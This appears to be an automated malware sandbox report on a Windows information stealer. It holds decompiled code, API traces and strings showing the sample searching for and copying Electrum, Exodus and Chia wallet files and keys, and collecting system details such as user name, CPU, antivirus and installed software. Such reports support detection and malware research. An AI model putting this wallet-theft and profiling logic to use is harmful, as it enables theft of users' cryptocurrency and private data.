				 *0x464860( &_v280, _t720);
				 *0x464860( &_v280, "\\");
				_t723 =  *0x453640; // 0x25c8c18
				 *0x464860( &_v280, _t723);
				 *0x464860( &_v280, "\\");
				_t726 =  *0x453928; // 0x25c8730
				 *0x464860( &_v280, _t726);
				 *0x464860( &_v1320, "\\");
				 *0x464860( &_v1320,  &_v280);
				 *0x464860( &_v1320, "\\");
				_t732 =  *0x453540; // 0x25ca330
				 *0x464860( &_v540, _t732);
				 *0x464860( &_v540, "\\");
				_t735 =  *0x45381c; // 0x25c8b70
				 *0x464860( &_v540, _t735);
				 *0x464860( &_v800, "\\");
				 *0x464860( &_v800,  &_v540);
				 *0x464860( &_v800, "\\");
				_t915 =  *0x453540; // 0x25ca330
				E004118B0(_t1087,  &_v1060, _t915, "*.*",  *((intOrPtr*)(_t963 + 0x20)), 0); // executed
				E004118B0(_t1087,  &_v1320,  &_v280, "*.*",  *((intOrPtr*)(_t963 + 0x20)), 0); // executed
				E004118B0(_t1087,  &_v800,  &_v540, "*.*",  *((intOrPtr*)(_t963 + 0x20)), 0); // executed
				E00411DD0(_t1087,  *((intOrPtr*)(_t963 + 0x20)), 0x443c1c, ".chia\\mainnet\\config", "*.*"); // executed
				E00411DD0(_t1087,  *((intOrPtr*)(_t963 + 0x20)), 0x443c1c, ".chia\\mainnet\\run", "*.*"); // executed
				E00411DD0(_t1087,  *((intOrPtr*)(_t963 + 0x20)), 0x443c1c, ".chia\\mainnet\\wallet", "*.sqlite"); // executed
				E00411DD0(_t1087,  *((intOrPtr*)(_t963 + 0x20)), 0x443c1c, ".chia_keys", "*.*"); // executed
				 *[fs:0x0] = _v16;
				_pop(_t961);
				_pop(_t964);
				_pop(_t757);
				return E0042A36A( *((intOrPtr*)(_t963 + 0x1c)), _t757, _v20 ^ _t965,  *((intOrPtr*)(_t963 + 0x20)), _t961, _t964);
			}

0x00412d80
0x00412d97
0x00412d9e
0x00412da8
0x00412db1
0x00412db3
0x00412db8
0x00412dbb
0x00412dc1
0x00412dc4
0x00412dcb
0x00412dd1
0x00412dd4
0x00412dd8
0x00412dde
0x00412de4
0x00412dfc
0x00412e01
0x00412e07
0x00412e0a
0x00412e0c
0x00412e12
0x00412e15
0x00412e19
0x00412e1c
0x00412e22
0x00412e28
0x00412e40
0x00412e45
0x00412e4b
0x00412e4e
0x00412e50
0x00412e56
0x00412e59
0x00412e5d
0x00412e61
0x00412e67
0x00412e6d
0x00412e85
0x00412e8d
0x00412e94
0x00412e99
0x00412e9c
0x00412e9e
0x00412ea4
0x00412ea7
0x00412eaf
0x00412eb5
0x00412ecb
0x00412ed0
0x00412ed7
0x00412edd
0x00412ee0
0x00412ee2
0x00412ee8
0x00412eeb
0x00412eef
0x00412ef5
0x00412efb
0x00412f13
0x00412f18
0x00412f1b
0x00412f1d
0x00412f23
0x00412f26
0x00412f2e
0x00412f32
0x00412f38
0x00412f4e
0x00412f56
0x00412f5d
0x00412f62
0x00412f65
0x00412f67
0x00412f6d
0x00412f70
0x00412f78
0x00412f7e
0x00412f94
0x00412f99
0x00412f9f
0x00412fa2
0x00412fa4
0x00412faa
0x00412fad
0x00412fb1
0x00412fb8
0x00412fbe
0x00412fc4
0x00412fdc
0x00412fe1
0x00412fe7
0x00412fea
0x00412fec
0x00412ff2
0x00412ff5
0x00412ff8
0x00412ffc
0x00413002
0x00413008
0x00413021
0x00413029
0x00413030
0x00413035
0x0041303b
0x0041303e
0x00413040
0x00413046
0x00413049
0x0041304d
0x00413053
0x00413059
0x00413071
0x00413076
0x0041307c
0x0041307f
0x00413081
0x00413087
0x0041308a
0x0041308e
0x00413095
0x0041309b
0x004130a1
0x004130b9
0x004130be
0x004130c4
0x004130c7
0x004130c9
0x004130cf
0x004130d2
0x004130d6
0x004130da
0x004130e0
0x004130e6
0x004130fe
0x00413106
0x0041310d
0x00413112
0x00413118
0x0041311b
0x0041311d
0x00413123
0x00413126
0x00413129
0x0041312f
0x00413135
0x0041314e
0x00413153
0x00413159
0x0041315c
0x0041315e
0x00413164
0x00413167
0x0041316b
0x00413172
0x00413178
0x0041317e
0x00413196
0x0041319b
0x004131a1
0x004131a4
0x004131a6
0x004131ac
0x004131af
0x004131b3
0x004131b7
0x004131bd
0x004131c3
0x004131db
0x004131e3
0x004131ea
0x004131ef
0x004131f2
0x004131f4
0x004131fa
0x004131fd
0x00413205
0x0041320b
0x00413221
0x00413226
0x00413229
0x0041322b
0x00413231
0x00413234
0x0041323c
0x00413243
0x00413249
0x0041325f
0x00413264
0x00413268
0x0041326e
0x00413271
0x00413273
0x00413279
0x0041327c
0x00413280
0x00413286
0x0041328c
0x004132a4
0x004132ac
0x004132b3
0x004132b8
0x004132be
0x004132c1
0x004132c3
0x004132c9
0x004132cc
0x004132d0
0x004132d6
0x004132dc
0x004132f4
0x004132f9
0x004132ff
0x00413302
0x00413304
0x0041330a
0x0041330d
0x00413311
0x00413318
0x0041331e
0x00413324
0x0041333c
0x00413341
0x00413347
0x0041334a
0x0041334c
0x00413352
0x00413355
0x00413359
0x0041335d
0x00413363
0x00413369
0x00413381
0x00413389
0x00413390
0x00413395
0x0041339b
0x0041339e
0x004133a0
0x004133a6
0x004133a9
0x004133ad
0x004133b3
0x004133b9
0x004133d1
0x004133d6
0x004133dc
0x004133df
0x004133e1
0x004133e7
0x004133ea
0x004133ee
0x004133f5
0x004133fb
0x00413401
0x00413419
0x0041341e
0x00413424
0x00413427
0x00413429
0x0041342f
0x00413432
0x00413436
0x0041343a
0x00413440
0x00413446
0x0041345e
0x00413466
0x0041346d
0x00413472
0x00413478
0x0041347b
0x0041347d
0x00413483
0x00413486
0x0041348a
0x00413490
0x00413496
0x004134ae
0x004134b3
0x004134b9
0x004134bc
0x004134c3
0x004134c9
0x004134cf
0x004134d1
0x004134d4
0x004134d8
0x004134de
0x004134f6
0x004134fb
0x00413501
0x00413504
0x00413506
0x0041350c
0x0041350f
0x00413513
0x00413517
0x0041351d
0x00413523
0x0041353b
0x00413543
0x0041354a
0x0041354f
0x00413552
0x00413554
0x0041355a
0x0041355d
0x00413565
0x0041356b
0x00413581
0x00413586
0x0041358c
0x0041358f
0x00413591
0x00413597
0x0041359a
0x0041359e
0x004135a5
0x004135ab
0x004135b1
0x004135c9
0x004135ce
0x004135d4
0x004135d7
0x004135d9
0x004135df
0x004135e2
0x004135e5
0x004135e9
0x004135ef
0x004135f5
0x0041360e
0x00413616
0x0041361d
0x00413622
0x00413625
0x00413627
0x0041362d
0x00413630
0x00413638
0x0041363e
0x00413654
0x00413659
0x0041365f
0x00413662
0x00413664
0x0041366a
0x0041366d
0x00413671
0x00413678
0x0041367e
0x00413684
0x0041369c
0x004136a1
0x004136a7
0x004136aa
0x004136ac
0x004136b2
0x004136b5
0x004136b9
0x004136bd
0x004136c3
0x004136c9
0x004136e1
0x004136e9
0x004136f0
0x004136f5
0x004136fb
0x004136fe
0x00413700
0x00413706
0x00413709
0x0041370d
0x00413713
0x00413719
0x00413731
0x00413736
0x0041373c
0x0041373f
0x00413741
0x00413747
0x0041374a
0x0041374e
0x00413755
0x0041375b
0x00413761
0x00413779
0x0041377e
0x00413784
0x00413787
0x00413789
0x0041378f
0x00413792
0x00413796
0x0041379a
0x004137a0
0x004137a6
0x004137be
0x004137c6
0x004137cd
0x004137d2
0x004137d8
0x004137db
0x004137dd
0x004137e3
0x004137e6
0x004137ea
0x004137f0
0x004137f6
0x0041380e
0x00413813
0x00413819
0x0041381c
0x0041381e
0x00413824
0x00413827
0x0041382b
0x00413832
0x00413838
0x0041383e
0x00413856
0x0041385b
0x00413861
0x00413864
0x00413866
0x0041386c
0x0041386f
0x00413873
0x00413877
0x0041387d
0x00413883
0x0041389b
0x004138a3
0x004138aa
0x004138af
0x004138b5
0x004138b8
0x004138ba
0x004138c0
0x004138c3
0x004138c7
0x004138cd
0x004138d3
0x004138eb
0x004138f0
0x004138f6
0x004138f9
0x004138fb
0x00413901
0x00413904
0x00413908
0x0041390f
0x00413915
0x0041391b
0x00413933
0x00413938
0x0041393e
0x00413941
0x00413943
0x00413949
0x0041394c
0x00413950
0x00413954
0x0041395a
0x00413960
0x00413978
0x0041397e
0x00413987
0x0041398c
0x00413992
0x00413995
0x00413997
0x0041399d
0x004139a0
0x004139a4
0x004139aa
0x004139b0
0x004139c8
0x004139cd
0x004139d3
0x004139d6
0x004139d8
0x004139de
0x004139e1
0x004139e5
0x004139ec
0x004139f2
0x004139f8
0x00413a10
0x00413a15
0x00413a1b
0x00413a1e
0x00413a20
0x00413a26
0x00413a29
0x00413a2d
0x00413a31
0x00413a37
0x00413a3d
0x00413a55
0x00413a5e
0x00413a65
0x00413a6a
0x00413a70
0x00413a73
0x00413a75
0x00413a7b
0x00413a7e
0x00413a82
0x00413a88
0x00413a8e
0x00413aa6
0x00413aab
0x00413ab1
0x00413ab8
0x00413abe
0x00413ac1
0x00413ac3
0x00413ac9
0x00413acc
0x00413ad0
0x00413ad6
0x00413aee
0x00413af3
0x00413af9
0x00413afc
0x00413afe
0x00413b04
0x00413b07
0x00413b0b
0x00413b0f
0x00413b15
0x00413b1b
0x00413b33
0x00413b3c
0x00413b43
0x00413b48
0x00413b4e
0x00413b51
0x00413b53
0x00413b59
0x00413b5c
0x00413b60
0x00413b66
0x00413b6c
0x00413b84
0x00413b89
0x00413b8f
0x00413b92
0x00413b94
0x00413b9a
0x00413b9d
0x00413ba1
0x00413ba8
0x00413bae
0x00413bb4
0x00413bcc
0x00413bd1
0x00413bd7
0x00413bda
0x00413bde
0x00413be4
0x00413bea
0x00413bec
0x00413bef
0x00413bf3
0x00413bf9
0x00413c11
0x00413c19
0x00413c20
0x00413c25
0x00413c28
0x00413c2a
0x00413c30
0x00413c33
0x00413c3b
0x00413c41
0x00413c57
0x00413c5c
0x00413c62
0x00413c65
0x00413c67
0x00413c6d
0x00413c70
0x00413c74
0x00413c7b
0x00413c81
0x00413c87
0x00413c9f
0x00413ca4
0x00413caa
0x00413cad
0x00413caf
0x00413cb5
0x00413cb8
0x00413cbc
0x00413cc0
0x00413cc6
0x00413ccc
0x00413ce4
0x00413ced
0x00413cf4
0x00413cf9
0x00413cfc
0x00413cfe
0x00413d04
0x00413d07
0x00413d0f
0x00413d15
0x00413d2b
0x00413d30
0x00413d36
0x00413d39
0x00413d3b
0x00413d41
0x00413d44
0x00413d48
0x00413d4f
0x00413d55
0x00413d5b
0x00413d73
0x00413d78
0x00413d7e
0x00413d81
0x00413d83
0x00413d89
0x00413d8c
0x00413d90
0x00413d94
0x00413d9a
0x00413da0
0x00413db8
0x00413dc0
0x00413dc7
0x00413dcf
0x00413dd5
0x00413ddd
0x00413de6
0x00413dee
0x00413df3
0x00413dfb
0x00413e04
0x00413e0c
0x00413e12
0x00413e1a
0x00413e22
0x00413e2a
0x00413e32
0x00413e37
0x00413e40
0x00413e5b
0x00413e6d
0x00413e7f
0x00413e91
0x00413ea3
0x00413eb8
0x00413ecc
0x00413ed2
0x00413edf
0x00413ef1
0x00413ef7
0x00413f04
0x00413f16
0x00413f1c
0x00413f29
0x00413f3b
0x00413f41
0x00413f4e
0x00413f60
0x00413f74
0x00413f86
0x00413f8c
0x00413f99
0x00413fab
0x00413fb1
0x00413fbe
0x00413fd0
0x00413fe4
0x00413ff6
0x00413fff
0x00414014
0x00414031
0x0041404e
0x00414066
0x00414081
0x00414099
0x004140b1
0x004140bf
0x004140c7
0x004140c8
0x004140c9
0x004140d7

APIs

_strlen.LIBCMT ref: 00412DE6
_strlen.LIBCMT ref: 00412E2A
_strlen.LIBCMT ref: 00412E6F

Part of subcall function 00404BC0: std::_Xinvalid_argument.LIBCPMT ref: 00404C35

Part of subcall function 00412570: _strlen.LIBCMT ref: 004125D6

_strlen.LIBCMT ref: 00412EB7
_strlen.LIBCMT ref: 00412EFD
_strlen.LIBCMT ref: 00412F3A

Part of subcall function 00412570: _memmove.LIBCMT ref: 00412747

_strlen.LIBCMT ref: 00412F80
_strlen.LIBCMT ref: 00412FC6
_strlen.LIBCMT ref: 0041300B

Part of subcall function 00412570: _memset.LIBCMT ref: 00412953
Part of subcall function 00412570: lstrcat.KERNEL32(?,00443C68), ref: 00412967
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445C08), ref: 00412979
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445A68), ref: 0041298B
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445A6C), ref: 0041299D
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445A6C), ref: 004129AF
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445A78), ref: 004129C1
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445A84), ref: 004129D3
Part of subcall function 00412570: lstrcat.KERNEL32(?,00445A44), ref: 004129E5
Part of subcall function 00412570: lstrcat.KERNEL32(?,00443C68), ref: 004129F7
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 00412A10

_strlen.LIBCMT ref: 0041305B
_strlen.LIBCMT ref: 004130A3
_strlen.LIBCMT ref: 004130E8

Part of subcall function 00412570: lstrcat.KERNEL32(?,00443C68), ref: 00412A22
Part of subcall function 00412570: lstrcat.KERNEL32(?,00000000), ref: 00412A54

_strlen.LIBCMT ref: 00413138
_strlen.LIBCMT ref: 00413180
_strlen.LIBCMT ref: 004131C5
_strlen.LIBCMT ref: 0041320D
_strlen.LIBCMT ref: 0041324B
_strlen.LIBCMT ref: 0041328E
_strlen.LIBCMT ref: 004132DE
_strlen.LIBCMT ref: 00413326
_strlen.LIBCMT ref: 0041336B
_strlen.LIBCMT ref: 004133BB
_strlen.LIBCMT ref: 00413403
_strlen.LIBCMT ref: 00413448
_strlen.LIBCMT ref: 00413498
_strlen.LIBCMT ref: 004134E0
_strlen.LIBCMT ref: 00413525
_strlen.LIBCMT ref: 0041356D
_strlen.LIBCMT ref: 004135B3
_strlen.LIBCMT ref: 004135F8
_strlen.LIBCMT ref: 00413640
_strlen.LIBCMT ref: 00413686
_strlen.LIBCMT ref: 004136CB
_strlen.LIBCMT ref: 0041371B
_strlen.LIBCMT ref: 00413763
_strlen.LIBCMT ref: 004137A8
_strlen.LIBCMT ref: 004137F8
_strlen.LIBCMT ref: 00413840
_strlen.LIBCMT ref: 00413885
_strlen.LIBCMT ref: 004138D5
_strlen.LIBCMT ref: 0041391D
_strlen.LIBCMT ref: 00413962
_strlen.LIBCMT ref: 004139B2
_strlen.LIBCMT ref: 004139FA
_strlen.LIBCMT ref: 00413A3F
_strlen.LIBCMT ref: 00413A90
_strlen.LIBCMT ref: 00413AD8
_strlen.LIBCMT ref: 00413B1D
_strlen.LIBCMT ref: 00413B6E
_strlen.LIBCMT ref: 00413BB6
_strlen.LIBCMT ref: 00413BFB
_strlen.LIBCMT ref: 00413C43
_strlen.LIBCMT ref: 00413C89
_strlen.LIBCMT ref: 00413CCE
_strlen.LIBCMT ref: 00413D17
_strlen.LIBCMT ref: 00413D5D
_strlen.LIBCMT ref: 00413DA2

Part of subcall function 004118B0: _memset.LIBCMT ref: 004118EC
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00000000), ref: 00411903
Part of subcall function 004118B0: wsprintfA.USER32 ref: 00411924
Part of subcall function 004118B0: FindFirstFileA.KERNEL32(?,?), ref: 00411955
Part of subcall function 004118B0: StrCmpCA.SHLWAPI(?,004456B0), ref: 0041197C
Part of subcall function 004118B0: StrCmpCA.SHLWAPI(?,004456AC), ref: 00411996
Part of subcall function 004118B0: wsprintfA.USER32 ref: 004119CA
Part of subcall function 004118B0: _memset.LIBCMT ref: 00411A15
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00443C68), ref: 00411A29
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445C08), ref: 00411A3B
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445A68), ref: 00411A4D

Part of subcall function 004118B0: wsprintfA.USER32 ref: 0041193E
Part of subcall function 004118B0: wsprintfA.USER32 ref: 004119E4
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445A6C), ref: 00411A5F
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445A6C), ref: 00411A71
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445A78), ref: 00411A83
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445A84), ref: 00411A95
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00445A44), ref: 00411AA7
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00443C68), ref: 00411AB9
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00000000), ref: 00411AC7
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00443C68), ref: 00411AD9
Part of subcall function 004118B0: lstrcat.KERNEL32(?,?), ref: 00411AF1
Part of subcall function 004118B0: lstrcat.KERNEL32(?,00443C68), ref: 00411B03
Part of subcall function 004118B0: lstrcat.KERNEL32(?,?), ref: 00411B27
Part of subcall function 004118B0: FindNextFileA.KERNEL32(?,?), ref: 00411B58
Part of subcall function 004118B0: FindClose.KERNEL32(?), ref: 00411B6D

Part of subcall function 00411B90: wsprintfA.USER32 ref: 00411BD5
Part of subcall function 00411B90: FindFirstFileA.KERNEL32(?,?), ref: 00411BEC
Part of subcall function 00411B90: StrCmpCA.SHLWAPI(?,004456B0), ref: 00411C0D
Part of subcall function 00411B90: StrCmpCA.SHLWAPI(?,004456AC), ref: 00411C27
Part of subcall function 00411B90: wsprintfA.USER32 ref: 00411C49
Part of subcall function 00411B90: wsprintfA.USER32 ref: 00411C70
Part of subcall function 00411B90: _memset.LIBCMT ref: 00411C84
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00443C68), ref: 00411C98
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445C08), ref: 00411CAA
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445A68), ref: 00411CBC
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445A6C), ref: 00411CCE
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445A6C), ref: 00411CE0
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445A78), ref: 00411CF2
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445A84), ref: 00411D04
Part of subcall function 00411B90: lstrcat.KERNEL32(?,00445A44), ref: 00411D16

_memset.LIBCMT ref: 00413E6D
_memset.LIBCMT ref: 00413E7F
_memset.LIBCMT ref: 00413E91
_memset.LIBCMT ref: 00413EA3
_memset.LIBCMT ref: 00413EB8
lstrcat.KERNEL32(?,00443C68), ref: 00413ECC
lstrcat.KERNEL32(?,025CA330), ref: 00413EDF
lstrcat.KERNEL32(?,00443C68), ref: 00413EF1
lstrcat.KERNEL32(?,025CA330), ref: 00413F04
lstrcat.KERNEL32(?,00443C68), ref: 00413F16
lstrcat.KERNEL32(?,025C8C18), ref: 00413F29
lstrcat.KERNEL32(?,00443C68), ref: 00413F3B
lstrcat.KERNEL32(?,025C8730), ref: 00413F4E
lstrcat.KERNEL32(?,00443C68), ref: 00413F60
lstrcat.KERNEL32(?,?), ref: 00413F74
lstrcat.KERNEL32(?,00443C68), ref: 00413F86
lstrcat.KERNEL32(?,025CA330), ref: 00413F99
lstrcat.KERNEL32(?,00443C68), ref: 00413FAB
lstrcat.KERNEL32(?,025C8B70), ref: 00413FBE
lstrcat.KERNEL32(?,00443C68), ref: 00413FD0
lstrcat.KERNEL32(?,?), ref: 00413FE4
lstrcat.KERNEL32(?,00443C68), ref: 00413FF6

Part of subcall function 00411DD0: wsprintfA.USER32 ref: 00411E10
Part of subcall function 00411DD0: FindFirstFileA.KERNEL32(?,?), ref: 00411E27
Part of subcall function 00411DD0: StrCmpCA.SHLWAPI(?,004456B0), ref: 00411E4C
Part of subcall function 00411DD0: StrCmpCA.SHLWAPI(?,004456AC), ref: 00411E66
Part of subcall function 00411DD0: wsprintfA.USER32 ref: 00411E88
Part of subcall function 00411DD0: wsprintfA.USER32 ref: 00411EAF
Part of subcall function 00411DD0: StrCmpCA.SHLWAPI(?,00443C1C), ref: 00411EBE
Part of subcall function 00411DD0: wsprintfA.USER32 ref: 00411EF2
Part of subcall function 00411DD0: PathMatchSpecA.SHLWAPI(?,?), ref: 00411F09
Part of subcall function 00411DD0: _memset.LIBCMT ref: 00411F21
Part of subcall function 00411DD0: lstrcat.KERNEL32(?,025C13D0), ref: 00411F37

Part of subcall function 00411DD0: lstrcat.KERNEL32(?,?), ref: 00411F4B
Part of subcall function 00411DD0: CopyFileA.KERNEL32(?,?,00000001), ref: 00411F61
Part of subcall function 00411DD0: DeleteFileA.KERNEL32(?), ref: 00411F85
Part of subcall function 00411DD0: _memset.LIBCMT ref: 00411FA2
Part of subcall function 00411DD0: lstrcat.KERNEL32(?,025CA330), ref: 00411FB2
Part of subcall function 00411DD0: lstrcat.KERNEL32(?,00443C68), ref: 00411FC4
Part of subcall function 00411DD0: lstrcat.KERNEL32(?,?), ref: 00411FD8
Part of subcall function 00411DD0: FindNextFileA.KERNEL32(?,?), ref: 0041200A
Part of subcall function 00411DD0: FindClose.KERNEL32(?), ref: 0041201F

Strings

*.json, xrefs: 00413D0A, 00413D26
\Exodus\backups, xrefs: 00413E56
\Electrum\wallets\, xrefs: 00412F29, 00412F49
*.sqlite, xrefs: 00414089
.chia\mainnet\config, xrefs: 0041405B
.chia\mainnet\wallet, xrefs: 0041408E
*.*, xrefs: 00412EAA, 00412EC6, 00412F73, 00412F8F, 00413200, 0041321C, 00413560, 0041357C, 00413633, 0041364F, 00413C36, 00413C52, 00413E4C, 00414007, 0041401E, 0041403B, 00414056, 00414071, 004140A1
Exodus\backups, xrefs: 00413E51
Exodus\exodus.wallet, xrefs: 00413237, 0041325A
.chia\mainnet\run, xrefs: 00414076
%, xrefs: 00413D90
.chia_keys, xrefs: 004140A6

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$lstrcat$_memsetwsprintf$FileFind$First$CloseNext$CopyDeleteMatchPathSpecXinvalid_argument_memmovestd::_
String ID: %$*.*$*.json$*.sqlite$.chia\mainnet\config$.chia\mainnet\run$.chia\mainnet\wallet$.chia_keys$Exodus\backups$Exodus\exodus.wallet$\Electrum\wallets\$\Exodus\backups
API String ID: 1571344694-3021314170
Opcode ID: def9ed60ce17d2dbee1fa35f96b47c12908e489c63cb0323e1c5296b01c210bd
Instruction ID: 1d549b504382cec1df23ff0e8440a9742a4db2a2b58e961ab46a77993865b946
Opcode Fuzzy Hash: def9ed60ce17d2dbee1fa35f96b47c12908e489c63cb0323e1c5296b01c210bd
Instruction Fuzzy Hash: 58C24FB09017189FC714EF6D9C91A6ABBB8AF49355F0001DEE408A7352DB74AE44CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C800 Relevance: 144.0, APIs: 78, Strings: 4, Instructions: 548stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040C843
lstrcat.KERNEL32(?,025C9C88), ref: 0040C859

Part of subcall function 0040A7F0: _strlen.LIBCMT ref: 0040A80E

lstrcat.KERNEL32(?,00000000), ref: 0040C88C
lstrcat.KERNEL32(?,004458A8), ref: 0040C8BB
lstrcat.KERNEL32(?,025C87E0), ref: 0040C8CF
lstrcat.KERNEL32(?,00000000), ref: 0040C8E2
lstrcat.KERNEL32(?,00443C5C), ref: 0040C8F4
lstrcat.KERNEL32(?,025C9E38), ref: 0040C908
lstrcat.KERNEL32(?,00000000), ref: 0040C936
lstrcat.KERNEL32(?,00443C5C), ref: 0040C962
lstrcat.KERNEL32(?,025C87C0), ref: 0040C976
lstrcat.KERNEL32(?,00000000), ref: 0040C9A4
lstrcat.KERNEL32(?,00443C5C), ref: 0040C9D0
lstrcat.KERNEL32(?,025C86B0), ref: 0040C9E4
lstrcat.KERNEL32(?,00000000), ref: 0040CA12
lstrcat.KERNEL32(?,004458A8), ref: 0040CA3E
lstrcat.KERNEL32(?,025C86C0), ref: 0040CA52
GetCurrentProcessId.KERNEL32 ref: 0040CA58
lstrcat.KERNEL32(?,00000000), ref: 0040CA84
lstrcat.KERNEL32(?,00443C5C), ref: 0040CAB0
lstrcat.KERNEL32(?,025C9828), ref: 0040CAC4
lstrcat.KERNEL32(?,004458A8), ref: 0040CAD6
lstrcat.KERNEL32(?,025C9D18), ref: 0040CAEA
lstrcat.KERNEL32(?,00000000), ref: 0040CAFD
lstrcat.KERNEL32(?,004458A4), ref: 0040CB0F
lstrcat.KERNEL32(?,00000000), ref: 0040CB22
lstrcat.KERNEL32(?,004458A0), ref: 0040CB34
lstrcat.KERNEL32(?,Install date: ), ref: 0040CB46
lstrcat.KERNEL32(?,00000000), ref: 0040CB59
lstrcat.KERNEL32(?,00443C5C), ref: 0040CB6B
lstrcat.KERNEL32(?,AV: ), ref: 0040CB7D
lstrcat.KERNEL32(?,00000000), ref: 0040CB90
lstrcat.KERNEL32(?,00443C5C), ref: 0040CBA2
lstrcat.KERNEL32(?,025C9BB0), ref: 0040CBB6
lstrcat.KERNEL32(?,00000000), ref: 0040CBC9
lstrcat.KERNEL32(?,00443C5C), ref: 0040CBDB
lstrcat.KERNEL32(?,025C9DF0), ref: 0040CBEE

Part of subcall function 0041EDD0: GetUserNameA.ADVAPI32(?,?), ref: 0041EDFB

lstrcat.KERNEL32(?,00000000), ref: 0040CC01
lstrcat.KERNEL32(?,00443C5C), ref: 0040CC13
lstrcat.KERNEL32(?,025C9768), ref: 0040CC27
lstrcat.KERNEL32(?,00000000), ref: 0040CC55
lstrcat.KERNEL32(?,00443C5C), ref: 0040CC81
lstrcat.KERNEL32(?,025C98A8), ref: 0040CC95
lstrcat.KERNEL32(?,00000000), ref: 0040CCC3
lstrcat.KERNEL32(?,00443C5C), ref: 0040CCEF
lstrcat.KERNEL32(?,025C9888), ref: 0040CD03
lstrcat.KERNEL32(?,00000000), ref: 0040CD16
lstrcat.KERNEL32(?,00443C5C), ref: 0040CD28
lstrcat.KERNEL32(?,025C9B98), ref: 0040CD3C
lstrcat.KERNEL32(?,00000000), ref: 0040CD4F
lstrcat.KERNEL32(?,00443C5C), ref: 0040CD61
lstrcat.KERNEL32(?,025C9CA0), ref: 0040CD74
lstrcat.KERNEL32(?,00000000), ref: 0040CDA2
lstrcat.KERNEL32(?,004458A8), ref: 0040CDCE
lstrcat.KERNEL32(?,025C9DC0), ref: 0040CDE1
lstrcat.KERNEL32(?,00443C5C), ref: 0040CDF3
lstrcat.KERNEL32(?,025C9D30), ref: 0040CE06

Part of subcall function 0041E930: _memset.LIBCMT ref: 0041E962
Part of subcall function 0041E930: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0041E982
Part of subcall function 0041E930: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 0041E9AA
Part of subcall function 0041E930: RegCloseKey.ADVAPI32(?), ref: 0041E9B7
Part of subcall function 0041E930: CharToOemA.USER32(00000000,?), ref: 0041E9CB

lstrcat.KERNEL32(?,00000000), ref: 0040CE19
lstrcat.KERNEL32(?,00443C5C), ref: 0040CE2B
lstrcat.KERNEL32(?,Cores: ), ref: 0040CE3D

Part of subcall function 0041E870: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,0040CE48,?,00000010,?,?,0040CE48), ref: 0041E88F
Part of subcall function 0041E870: GetLastError.KERNEL32(?,00000010,?,?,0040CE48), ref: 0041E8A0
Part of subcall function 0041E870: _free.LIBCMT ref: 0041E8B0
Part of subcall function 0041E870: _malloc.LIBCMT ref: 0041E8BC
Part of subcall function 0041E870: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,0040CE48,?,?,0040CE48), ref: 0041E8D4
Part of subcall function 0041E870: _free.LIBCMT ref: 0041E8FD

Part of subcall function 00423BF0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00423D5C

lstrcat.KERNEL32(?,00000000), ref: 0040CE71
lstrcat.KERNEL32(?,00443C5C), ref: 0040CE9D
lstrcat.KERNEL32(?,Threads: ), ref: 0040CEAF
lstrcat.KERNEL32(?,00000000), ref: 0040CEDD
lstrcat.KERNEL32(?,00443C5C), ref: 0040CF24
lstrcat.KERNEL32(?,025C86D0), ref: 0040CF38
lstrcat.KERNEL32(?,00000000), ref: 0040CF4B
lstrcat.KERNEL32(?,00443C5C), ref: 0040CF5D
lstrcat.KERNEL32(?,025C9BF8), ref: 0040CF70
lstrcat.KERNEL32(?,00000000), ref: 0040CF83
lstrcat.KERNEL32(?,004458A8), ref: 0040CF95
lstrcat.KERNEL32(?,025C9E68), ref: 0040CFA9
lstrcat.KERNEL32(?,00443C5C), ref: 0040CFBB
lstrcat.KERNEL32(?,00443C5C), ref: 0040CFDF
lstrcat.KERNEL32(?,025C9D60), ref: 0040CFF2
lstrcat.KERNEL32(?,00443C5C), ref: 0040D004

Part of subcall function 0041E9F0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000010,?), ref: 0041EA3D
Part of subcall function 0041E9F0: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0041EA7C
Part of subcall function 0041E9F0: wsprintfA.USER32 ref: 0041EAA4
Part of subcall function 0041E9F0: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041EAC6
Part of subcall function 0041E9F0: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,00000400), ref: 0041EB00
